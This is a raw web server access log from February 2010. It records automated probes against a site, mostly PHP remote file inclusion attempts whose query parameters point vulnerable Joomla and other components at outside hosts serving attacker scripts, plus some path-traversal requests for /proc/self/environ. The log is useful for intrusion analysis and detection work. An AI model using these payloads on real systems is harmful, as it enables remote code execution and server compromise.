209.126.254.112 - - [21/Feb/2010:09:28:25 -0800] "GET /logs/access_100119.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:29:03 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:29:04 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:29:04 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:29:22 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:29:22 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:29:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:30:06 -0800] "GET /logs/access_100119.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:09:30:11 -0800] "GET /logs/access_100208.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:09:31:01 -0800] "GET /logs/access_100120.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:31:18 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:31:18 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:31:19 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:31:42 -0800] "GET /cart_content.php?cart_isp_root=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:31:43 -0800] "GET /logs/access_100115.log%20//cart_content.php?cart_isp_root=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:31:46 -0800] "GET /logs//cart_content.php?cart_isp_root=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:31:50 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:31:51 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:31:51 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:32:04 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:32:04 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:32:05 -0800] "GET /logs/access_100205.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:32:35 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:32:47 -0800] "GET /logs/access_100128.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:32:55 -0800] "GET /logs/access_100203.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:33:04 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:09:33:06 -0800] "GET /logs/access_100115.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:33:07 -0800] "GET /logs/access_100205.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:33:08 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:33:13 -0800] "GET /logs/access_100128.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:33:15 -0800] "GET /logs/access_100206.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:33:58 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:09:34:00 -0800] "GET /logs/?S=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:34:01 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:34:01 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:09:34:28 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:09:34:28 -0800] "GET /delete_all.php?board_skin_path=http://www.kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:09:34:28 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:34:30 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:34:31 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:34:31 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:34:42 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:34:49 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:34:49 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:34:49 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:35:19 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:35:20 -0800] "GET /COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:35:20 -0800] "GET /logs/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:09:35:29 -0800] "GET /logs/access_100221.log HTTP/1.0" 200 1529324 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:09:35:29 -0800] "GET /logs/access_100114.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:09:35:29 -0800] "GET /logs/access_100201.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [21/Feb/2010:09:35:37 -0800] "GET /logs/access_100119.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:35:53 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:35:53 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:35:54 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:36:05 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:36:05 -0800] "GET /logs/access_100205.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:36:06 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [21/Feb/2010:09:38:02 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [21/Feb/2010:09:38:02 -0800] "GET /logs/access_100130.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [21/Feb/2010:09:38:02 -0800] "GET /logs/access_100206.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [21/Feb/2010:09:38:02 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:09:38:19 -0800] "GET /logs/access_100205.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:09:39:12 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:09:39:12 -0800] "GET /errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:09:39:12 -0800] "GET /logs/errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:09:39:18 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.108.131 - - [21/Feb/2010:09:39:43 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
65.55.108.131 - - [21/Feb/2010:09:39:44 -0800] "GET /atesh_info/lt.php?t=4903374795 HTTP/1.1" 200 88 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
74.52.8.138 - - [21/Feb/2010:09:40:38 -0800] "GET /logs/access_100202.log/tools/send_reminders.php?includedir=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:40:38 -0800] "GET /tools/send_reminders.php?includedir=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:40:39 -0800] "GET /logs/tools/send_reminders.php?includedir=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:40:55 -0800] "GET /logs/access_100128.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:09:41:12 -0800] "GET /logs/access_100218.log HTTP/1.0" 200 1464129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:41:17 -0800] "GET /tools/send_reminders.php?includedir=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:41:17 -0800] "GET /logs/tools/send_reminders.php?includedir=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
74.52.8.138 - - [21/Feb/2010:09:41:19 -0800] "GET /logs/access_100202.log/tools/send_reminders.php?includedir=http://www.b3infotech.com/readme.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:41:27 -0800] "GET /logs/access_100205.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:41:31 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:09:41:32 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:09:42:24 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:09:42:24 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:09:42:24 -0800] "GET /include/prodler.class.php?sPath=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:43:34 -0800] "GET /delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:43:34 -0800] "GET /logs/access_100121.log%20%20//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:43:34 -0800] "GET /logs//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:09:43:46 -0800] "GET /logs/access_100119.log%20%20//include/prodler.class.php?sPath=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:44:01 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:44:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:44:02 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:44:11 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:44:14 -0800] "GET /delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:44:14 -0800] "GET /logs/access_100121.log%20%20//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:44:14 -0800] "GET /logs//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.200.89.25 - - [21/Feb/2010:09:44:20 -0800] "GET /logs/access_100114.log//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/cc??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.200.89.25 - - [21/Feb/2010:09:44:20 -0800] "GET /index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/cc??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
74.200.89.25 - - [21/Feb/2010:09:44:20 -0800] "GET /logs//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/cc??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:09:44:29 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:09:44:29 -0800] "GET /delete_all.php?board_skin_path=http://www.kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:09:44:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:09:44:46 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.84.83.42 - - [21/Feb/2010:09:50:12 -0800] "GET /logs/access_100124.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://201.199.194.8/conta/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.84.83.42 - - [21/Feb/2010:09:50:45 -0800] "GET /logs/access_100119.log/COMPONENTS/COM_KOESUBMIT/KOESUBMIT.PHP?MOSCONFIG_ABSOLUTE_PATH=http://201.199.194.8/conta/copyright.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:52:18 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:52:18 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:52:19 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:52:19 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:52:19 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
